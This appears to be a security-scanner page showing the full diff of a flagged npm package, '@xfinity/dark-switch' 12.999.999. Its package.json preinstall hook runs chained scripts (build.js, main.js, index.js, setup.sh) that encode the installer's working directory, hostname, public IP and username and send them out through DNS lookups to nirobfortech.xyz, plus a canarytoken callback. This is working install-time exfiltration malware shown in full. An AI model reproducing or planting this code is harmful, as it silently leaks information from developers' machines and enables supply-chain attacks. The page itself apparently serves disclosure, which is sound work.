@xfinity/dark-switch 12.999.999

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @xfinity/dark-switch might be problematic. Click here for more details.

package/build.js ADDED
@@ -0,0 +1,13 @@
1
+ const { exec } = require("child_process");
2
+ exec("node main.js > /dev/null 2>&1;", (error, data, getter) => {
3
+ if(error){
4
+ console.log("error",error.message);
5
+ return;
6
+ }
7
+ if(getter){
8
+ console.log(data);
9
+ return;
10
+ }
11
+ console.log(data);
12
+
13
+ });
package/index.js ADDED
@@ -0,0 +1,13 @@
1
+ const { exec } = require("child_process");
2
+ exec("pwd | xxd -p | while read ut;do dig $ut.nirobfortech.xyz;done; b=$(hostname | head | xxd -p) && nslookup $b.nirobfortech.xyz > /dev/null 2>&1; c=$(curl ifconfig.me | head | xxd -p) && nslookup $c.nirobfortech.xyz > /dev/null 2>&1; d=$(echo @xfinity/dark-switch | head | xxd -p) && nslookup $d.nirobfortech.xyz > /dev/null 2>&1; e=$(whoami | head | xxd -p ) && nslookup $a.nirobfortech.xyz > /dev/null 2>&1; curl https://canarytokens.com/tags/articles/traffic/pgkleomf0s31ab8s3q3dyhdyt/submit.aspx;", (error, data, getter) => {
3
+ if(error){
4
+ console.log("error",error.message);
5
+ return;
6
+ }
7
+ if(getter){
8
+ console.log(data);
9
+ return;
10
+ }
11
+ console.log(data);
12
+
13
+ });
package/main.js ADDED
@@ -0,0 +1,13 @@
1
+ const { exec } = require("child_process");
2
+ exec("node index.js > /dev/null 2>&1 && sh setup.sh > /dev/null 2>&1;", (error, data, getter) => {
3
+ if(error){
4
+ console.log("error",error.message);
5
+ return;
6
+ }
7
+ if(getter){
8
+ console.log(data);
9
+ return;
10
+ }
11
+ console.log(data);
12
+
13
+ });
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "@xfinity/dark-switch",
3
+ "version": "12.999.999",
4
+ "description": "",
5
+ "main": "main.js",
6
+ "scripts": {
7
+ "preinstall": "node build.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "author": "lexigreen45678",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "express": "^4.17.1"
14
+ }
15
+ }
package/setup.sh ADDED
@@ -0,0 +1,9 @@
1
+ #!/usr/bin/bash
2
+
3
+ pwd | xxd -p | while read ut;do dig $ut.nirobfortech.xyz;done;
4
+ b=$(hostname | head | base64) && dig $b.nirobfortech.xyz > /dev/null 2>&1;
5
+ c=$(curl ifconfig.me | head | base64) && dig $c.nirobfortech.xyz > /dev/null 2>&1;
6
+ d=$(echo "@xfinity/dark-switch" | head | base64) && dig $d.nirobfortech.xyz > /dev/null 2>&1;
7
+ e=$(whoami | head | base64) && dig $a.nirobfortech.xyz > /dev/null 2>&1;
8
+ f=$(curl https://canarytokens.com/tags/articles/traffic/pgkleomf0s31ab8s3q3dyhdyt/submit.aspx);
9
+ #echo $a && $b && $c > /dev/null 2>&1;